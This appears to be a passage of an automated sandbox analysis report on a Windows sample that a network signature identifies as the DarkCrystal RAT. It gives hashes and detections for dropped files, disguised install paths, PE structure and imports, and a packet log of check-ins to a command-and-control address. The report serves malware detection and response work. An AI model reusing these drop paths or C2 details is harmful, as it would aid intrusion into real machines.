                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):151
                                                                                                                  Entropy (8bit):4.798936293036221
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXhRQuh8was8u6vo1/3JFyXKvj:Vx993DEUGBPFBJFy8
                                                                                                                  MD5:E9095824738BA9F9B830DC031643C809
                                                                                                                  SHA1:0CA4AA84D0399F9211DB5347740BBFB742CB7259
                                                                                                                  SHA-256:4E2A10D592FB67914A3D01E1FE5BDECFB9EF2886F05750109FB3D296989B43C5
                                                                                                                  SHA-512:25B2ACBD543C4120FC11626F3F044023739BB1507989CF723DA5C2101EE49F6DB0C133100C98126E0E43358DB79B15B97C1BFA7354745B48D74CEF8935981B4F
                                                                                                                  Malicious:false
                                                                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/01/2025 10:57:03..10:57:03, error: 0x80072746.10:57:08, error: 0x80072746.
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.473166054024146
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:1znAXdPcM5.exe
                                                                                                                  File size:2'236'943 bytes
                                                                                                                  MD5:e656db3deb4cf58570317e64607c5420
                                                                                                                  SHA1:828c7c6b815e294ee7a5bbe26af14ed3307fd4be
                                                                                                                  SHA256:71be504d45fbc0506cfd654d3d185f11774f4b2f0613ae2199a583438f989caf
                                                                                                                  SHA512:403b1f9932c9f844eaffef7370dd35cbc0bef6ed6489be5e5d24cb53a4a49bcc45b20be4307b10532fbc3e90841f18181536a92762d42ff57d33a611392203a5
                                                                                                                  SSDEEP:24576:2TbBv5rUyXVOnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFg/:IBJOM5aaeNylOhr0Skf0CulFFyh
                                                                                                                  TLSH:7CA5AE1679924F33C36416328557033D92A0DB293A22EF1F361F24D6A9177F29F722A7
                                                                                                                  Icon Hash:1515d4d4442f2d2d
                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                  Instruction
                                                                                                                  call 00007F9E607FC55Bh
                                                                                                                  jmp 00007F9E607FBE6Dh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F9E607EECB7h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007F9E607FF2FFh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007F9E607FBFFCh
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007F9E607FB5B9h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F9E607EEC32h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F9E607FEDB9h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F9E607FBF78h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F9E607FED9Ch
                                                                                                                  int3
                                                                                                                  jmp 00007F9E60800837h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x3d070          0x34          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3d0a4          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x64000          0xdff8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x72000          0x233c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3b11c          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x355f8          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x33000          0x278         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x3c5ec          0x120         .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x31bdc       0x31c00   2831bb8b11e3209658a53131886cdf98  False     0.5909380888819096  data       6.712962136932442   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x33000          0xaec0        0xb000    042f11346230ca5aa360727d9908e809  False     0.4579190340909091  data       5.261605615899847   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3e000          0x24720       0x1000    9670b581969e508258d8bc903025de5e  False     0.451416015625      data       4.387459135575936   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat  0x63000          0x190         0x200     c83554035c63bb446c6208d0c8fa0256  False     0.4453125           data       3.3327310103022305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x64000          0xdff8        0xe000    ba08fbcd0ed7d9e6a268d75148d9914b  False     0.6373639787946429  data       6.638661032196024   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x72000          0x233c        0x2400    40b5e17755fd6fdd34de06e5cdb7f711  False     0.7749565972222222  data       6.623012966548067   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type  Language  Country  ZLIB Complexity
PNG            0x64650  0xb45   PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced  English  United States  1.0027729636048528
PNG            0x65198  0x15a9  PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced  English  United States  0.9363390441839495
RT_ICON        0x66748  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors  English  United States  0.47832369942196534
RT_ICON        0x66cb0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors  English  United States  0.5410649819494585
RT_ICON        0x67558  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors  English  United States  0.4933368869936034
RT_ICON        0x68400  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m  English  United States  0.5390070921985816
RT_ICON        0x68868  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m  English  United States  0.41393058161350843
RT_ICON        0x69910  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m  English  United States  0.3479253112033195
RT_ICON        0x6beb8  0x3d71  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced  English  United States  0.9809269502193401
RT_DIALOG      0x70588  0x286   data  English  United States  0.5092879256965944
RT_DIALOG      0x70358  0x13a   data  English  United States  0.60828025477707
RT_DIALOG      0x70498  0xec    data  English  United States  0.6991525423728814
RT_DIALOG      0x70228  0x12e   data  English  United States  0.5927152317880795
RT_DIALOG      0x6fef0  0x338   data  English  United States  0.45145631067961167
RT_DIALOG      0x6fc98  0x252   data  English  United States  0.5757575757575758
RT_STRING      0x70f68  0x1e2   data  English  United States  0.3900414937759336
RT_STRING      0x71150  0x1cc   data  English  United States  0.4282608695652174
RT_STRING      0x71320  0x1b8   data  English  United States  0.45681818181818185
RT_STRING      0x714d8  0x146   data  English  United States  0.5153374233128835
RT_STRING      0x71620  0x46c   data  English  United States  0.3454063604240283
RT_STRING      0x71a90  0x166   data  English  United States  0.49162011173184356
RT_STRING      0x71bf8  0x152   data  English  United States  0.5059171597633136
RT_STRING      0x71d50  0x10a   data  English  United States  0.49624060150375937
RT_STRING      0x71e60  0xbc    data  English  United States  0.6329787234042553
RT_STRING      0x71f20  0xd6    data  English  United States  0.5747663551401869
RT_GROUP_ICON  0x6fc30  0x68    data  English  United States  0.7019230769230769
RT_MANIFEST    0x70810  0x753   XML 1.0 document, ASCII text, with CRLF line terminators  English  United States  0.3957333333333333
DLL           Import
KERNEL32.dll  GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll  SysAllocString, SysFreeString, VariantClear
gdiplus.dll   GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                        SID      Signature                                             Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
2025-01-01T15:02:11.758998+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49730        104.21.38.84  80         TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                  Jan 1, 2025 15:02:17.412086964 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.760162115 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.765090942 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.867383957 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.024719954 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.122817039 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.337171078 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.572232008 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.573785067 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.577287912 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.577502966 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.578672886 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.578739882 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.595827103 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.600682974 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.625885963 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.626046896 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.630697012 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.630810022 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.641189098 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.645963907 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.671380997 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.948111057 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.948162079 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.993779898 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.998625040 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.084362984 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.134088993 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.353039980 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.399677038 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.492067099 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.493696928 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.498528957 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.498616934 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.498711109 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.500093937 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.500150919 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.503515005 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.853215933 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.858201027 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.963844061 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.008346081 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.223815918 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.337182999 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.354238033 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.358474970 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.464600086 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.464766026 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.464797020 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.464950085 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.465044022 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.465046883 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.465764046 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.470499992 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.909554005 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.914602041 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.918656111 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.024744987 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.261053085 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.314806938 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.391740084 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.396661997 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.396737099 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.396924973 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.401709080 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.743516922 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.748487949 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.868206024 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.915290117 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.127341986 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.180912018 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.257241964 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.257632017 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.264136076 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.264208078 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.264467955 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.264525890 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.264643908 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.269443989 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.618623018 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.623564959 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.708975077 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.776676893 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.975405931 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.131741047 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.132215023 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.137607098 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.137686968 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.137911081 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.137990952 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.138154984 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.142993927 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.493690014 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.498624086 CET8049757104.21.38.84192.168.2.4
